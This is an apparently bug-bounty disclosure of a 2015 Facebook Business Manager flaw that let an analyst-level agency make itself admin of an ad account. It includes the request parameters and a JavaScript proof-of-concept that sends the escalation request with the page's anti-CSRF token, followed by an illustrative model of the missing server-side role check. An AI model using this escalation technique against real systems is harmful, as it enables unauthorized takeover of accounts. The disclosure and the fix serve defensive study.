Bypass ad account roles vulnerability 2015
2015
ads
bounty
bug
business
bypass
exploit
facebook
facebook exploit
hack
roles
vulnerability
3 comments

I discovered a vulnerability in Facebook that allowed a normal (non-admin) user of an ad account to gain unauthorized admin access to that ad account.
Admins of an ad account can add any user to their ad account with one of these three roles:
- admin
- advertiser
- analyst
Facebook launched Business Manager in 2014 to help businesses and agencies manage their Facebook Pages; it is accessible from business.facebook.com.
In Facebook Business Manager, a business account can assign agencies to its own ad accounts,
so that agencies get access to those ad accounts with limited permissions (the owner sets this access during the "assign agency" process).
The vulnerability that I found allows these agencies, holding only a normal role (2 or 3 in the list above, i.e. advertiser or analyst), to change their own access to admin!
Scenario:
I have a business account and I give analyst permission to another business account to work on my ad account.
That business account can bypass the roles and get admin access!
Details:
With only analyst permission on an ad account, send this request:
request url : facebook.com/ads/manage/settings/permissions/?action=add_user
request body :
act: [ad_account_id]
user_id: [user_id]
add_user_permission: [permission: 1001 = admin, 1002 = advertiser, 1003 = analyst]
Exploit :
// Proof-of-concept request from the original report (the endpoint was fixed by Facebook in March 2015, see the timeline below).
var Xhr = new XMLHttpRequest();
// Relative URL: the request goes to the same origin as the page the script runs in.
Xhr.open("POST", "/ads/manage/settings/permissions/?action=add_user", true);
Xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
var p = "act=__ACCID__&user_id=__USERID__&add_user_permission=__PERM__&__a=1";
// fb_dtsg is the anti-CSRF token embedded in the page; the original snippet was missing the "&" separator before it.
p += "&fb_dtsg=" + encodeURIComponent(document.getElementsByName("fb_dtsg")[0].value);
Xhr.send(p);
__ACCID__ = ad account id
__USERID__ = the user who will become the new admin ;)
__PERM__ = permission (1001, 1002 or 1003)
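As an added example (not Facebook's code and not from the original report), here is the server-side check that was missing: a minimal model of the add_user handler, with the vulnerable form that trusts the requested role beside a hardened form that requires the caller to already be an admin of that ad account. The account data, user names and function names are constructed for illustration; the role ids follow the post.

```javascript
// Role ids as described in the post: 1001 admin, 1002 advertiser, 1003 analyst.
const ROLE = { ADMIN: 1001, ADVERTISER: 1002, ANALYST: 1003 };

// Constructed sample state: ad account "act_123" owned by business user "owner",
// with agency user "agency" granted analyst access only.
function sampleAccounts() {
  return { act_123: { members: { owner: ROLE.ADMIN, agency: ROLE.ANALYST } } };
}

// Vulnerable handler (hypothetical reconstruction of the bug class): the caller
// only has to hold *some* role on the account, and the requested role is applied as-is.
function addUserVulnerable(accounts, callerId, body) {
  const acct = accounts[body.act];
  if (!acct || !(callerId in acct.members)) return { ok: false, reason: 'no access' };
  acct.members[body.user_id] = Number(body.add_user_permission); // caller-controlled role
  return { ok: true };
}

// Hardened handler: the caller's own role on *this* ad account must be admin
// (a role on some other account does not count), and the requested role must be
// one of the three known values rather than whatever number the client sent.
function addUserHardened(accounts, callerId, body) {
  const acct = accounts[body.act];
  if (!acct || acct.members[callerId] !== ROLE.ADMIN) {
    return { ok: false, reason: 'caller is not an admin of this ad account' };
  }
  const perm = Number(body.add_user_permission);
  if (!Object.values(ROLE).includes(perm)) return { ok: false, reason: 'unknown role' };
  acct.members[body.user_id] = perm;
  return { ok: true };
}

// Replays the scenario from the post against either handler: the analyst-only
// agency submits add_user for itself with add_user_permission=1001.
function demo(handler) {
  const accounts = sampleAccounts();
  const body = { act: 'act_123', user_id: 'agency', add_user_permission: '1001' };
  const result = handler(accounts, 'agency', body);
  return { ok: result.ok, agencyRole: accounts.act_123.members.agency };
}
```

With the vulnerable handler demo() reports the agency as admin (1001); with the hardened handler the request is refused and the agency stays analyst (1003), while a genuine admin can still add users.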
POC :
I removed some sections that used a user id or email.
Timeline:
- Mar 14, 2015 01:27am: Initial report
- Mar 17, 2015 03:35am: Bug acknowledged by security team
- Mar 17, 2015 08:00am: Security team member Reginaldo informed me that the vulnerability was fixed
- Mar 20, 2015 10:08pm: Facebook Security Team rewarded me with $8000.
great find